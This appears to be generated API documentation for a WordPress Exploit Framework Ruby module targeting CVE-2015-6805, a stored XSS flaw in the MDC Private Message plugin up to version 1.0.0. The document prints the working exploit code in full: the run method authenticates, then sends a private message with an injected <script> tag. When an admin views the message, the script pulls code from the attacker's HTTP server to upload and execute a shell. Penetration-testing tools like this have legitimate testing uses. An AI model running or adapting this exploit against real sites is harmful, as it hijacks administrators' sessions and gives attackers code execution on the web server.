Class: Wpxf::Exploit::MdcPrivateMessageXssShellUpload
- Includes:
- Wpxf, WordPress::Login, WordPress::Plugin, WordPress::Xss
- Defined in:
- lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
-
#initialize ⇒ MdcPrivateMessageXssShellUpload
constructor
A new instance of MdcPrivateMessageXssShellUpload.
- #msg_body ⇒ Object
- #msg_subject ⇒ Object
- #run ⇒ Object
- #user_id ⇒ Object
Methods included from WordPress::Xss
#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ MdcPrivateMessageXssShellUpload
Returns a new instance of MdcPrivateMessageXssShellUpload.
9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 9 def initialize super update_info( name: 'MDC Private Message XSS Shell Upload', desc: 'This module exploits a lack of validation in versions '\ '<= 1.0.0 of the MDC Private Message plugin which '\ 'allows authenticated users of any level to send messages '\ 'containing a script which allows this module to upload and '\ 'execute the payload in the context of the web server once an '\ 'admin reads the message containing the stored script.', author: [ 'Chris Kellum', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['CVE', '2015-6805'], ['WPVDB', '8154'], ['EDB', '37907'] ], date: 'Aug 20 2015' ) ([ StringOption.new( name: 'username', desc: 'The WordPress username to authenticate with', required: true ), StringOption.new( name: 'password', desc: 'The WordPress password to authenticate with', required: true ), IntegerOption.new( name: 'user_id', desc: 'The user ID of the user to send the message to', default: 1, required: true ), StringOption.new( name: 'msg_subject', desc: 'The subject of the message that will be sent to the admin', required: true, default: Utility::Text.rand_alphanumeric(rand(5..20)) ), StringOption.new( name: 'msg_body', desc: 'The text portion of the message that will be visible to the recipient', required: true, default: Utility::Text.rand_alphanumeric(rand(10..50)) ), ]) end |
Instance Method Details
#check ⇒ Object
64 65 66 |
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 64 def check check_plugin_version_from_readme('mdc-private-message', '1.0.0.1') end |
#msg_body ⇒ Object
76 77 78 |
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 76 def msg_body datastore['msg_body'] end |
#msg_subject ⇒ Object
72 73 74 |
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 72 def msg_subject datastore['msg_subject'] end |
#run ⇒ Object
80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 |
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 80 def run return false unless super = authenticate_with_wordpress(datastore['username'], datastore['password']) return false unless # Success will be determined in another procedure, so initialize to false. @success = false emit_info 'Storing script...' emit_info xss_include_script, true res = execute_post_request( url: wordpress_url_admin_ajax, cookie: , body: { 'action' => 'mdc_send_msg', 'from' => user_id.to_s, 'to' => user_id.to_s, 'subject' => msg_subject, 'message' => "#{msg_body}<script>#{xss_include_script}</script>" } ) if res.nil? emit_error 'No response from the target' return false end if res.code != 200 emit_error "Server responded with code #{res.code}" return false end emit_success "Script stored and will be executed when the user views the message" start_http_server return @success end |
#user_id ⇒ Object
68 69 70 |
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 68 def user_id normalized_option_value('user_id') end |